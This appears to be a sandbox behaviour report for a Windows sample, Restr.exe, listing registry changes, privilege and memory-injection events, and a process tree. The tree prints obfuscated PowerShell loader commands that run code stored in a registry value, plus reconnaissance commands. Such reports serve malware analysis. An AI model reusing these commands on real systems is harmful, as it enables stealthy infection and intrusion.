Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000a66e371bb720c51e3ce959f7d76bb8c3cdb54906ddbacd6d16db9979ca8ee8fa000000000e800000000200002000000004b2a81af273a64ddc93af4aaa6f1741e55ca8e7ecb1b47489aad81f732e0205c0000000c1f9028bd43c6aab06677e5630a882416d5ecf594f78ce11bb4c7923d0cc945b015466f8e51f0eebadb06f225dd20801fb75bc06aada4047ce0c0b6b94a26fe7b7521eb0939e853f0e4c4534a8330afa77b05b9c674f7ae16c976509c0a5f253be1f71376005c18e943fe2cdf0449867f0de57d66c9983a2dbac1641bb19d0f6ff8b83536d8555b7f15507f68f55b707ea684b69deba8d1e18914d13d00d54f582e00c836065ad39d3093e75418b58bf996b600f7f54f9c94acf72a991a1f90f400000000e708e0f62d9f0fe62c53eb447fa000d062a052fcaf6e7dc4811e627bbc9696165c7c7723fca50b823d0c92ed7dda40a63d46d1f2565fe9605bc7f37542b1b31 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30947395" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff1a0000001a000000a00400007f020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2317671783" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80997d7c4338d801 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Runs net.exe

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Restr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 (LUID not resolved by the sandbox; SE_INC_WORKING_SET_PRIVILEGE per winnt.h) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 (LUID not resolved by the sandbox; SE_TIME_ZONE_PRIVILEGE per winnt.h) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 (LUID not resolved by the sandbox; SE_CREATE_SYMBOLIC_LINK_PRIVILEGE per winnt.h) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 (LUID not resolved by the sandbox; SE_DELEGATE_SESSION_USER_IMPERSONATE_PRIVILEGE per winnt.h) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2420 wrote to memory of 2728 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 2728 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 2728 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 1748 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 1748 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 1748 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 4592 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 4592 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 4592 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 3596 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 3596 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 3596 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 2180 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 2180 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 2180 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 4732 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 4732 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 4732 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 1564 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 1564 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 1564 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 2320 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 2320 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 2320 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 4184 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 4184 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 4184 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 2012 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 2012 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 2012 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 3344 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 3344 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 3344 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1444 wrote to memory of 3268 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 1444 wrote to memory of 3268 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 3268 wrote to memory of 1184 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 3268 wrote to memory of 1184 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 1184 wrote to memory of 3884 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1184 wrote to memory of 3884 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 3884 wrote to memory of 3896 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3884 wrote to memory of 3896 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3884 wrote to memory of 2864 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3884 wrote to memory of 2864 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3884 wrote to memory of 212 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3884 wrote to memory of 212 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 212 wrote to memory of 204 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 212 wrote to memory of 204 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3884 wrote to memory of 3596 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3884 wrote to memory of 3596 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3596 wrote to memory of 1380 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3596 wrote to memory of 1380 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3884 wrote to memory of 656 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 4376 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\Restr.exe C:\Windows\Explorer.EXE
PID 5016 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 5016 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3344 wrote to memory of 1704 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3344 wrote to memory of 1704 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3084 wrote to memory of 5076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 3084 wrote to memory of 5076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4912 wrote to memory of 4768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4912 wrote to memory of 4768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1808 wrote to memory of 3824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 1808 wrote to memory of 3824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 2968 wrote to memory of 4132 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\whoami.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Restr.exe

"C:\Users\Admin\AppData\Local\Temp\Restr.exe"

C:\Program Files (x86)\Internet Explorer\ielowutil.exe

"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:17410 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82950 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82954 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:17412 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82960 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82964 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82968 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82972 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82976 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82980 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82984 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\forfiles.exe

forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\cmd.exe

/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

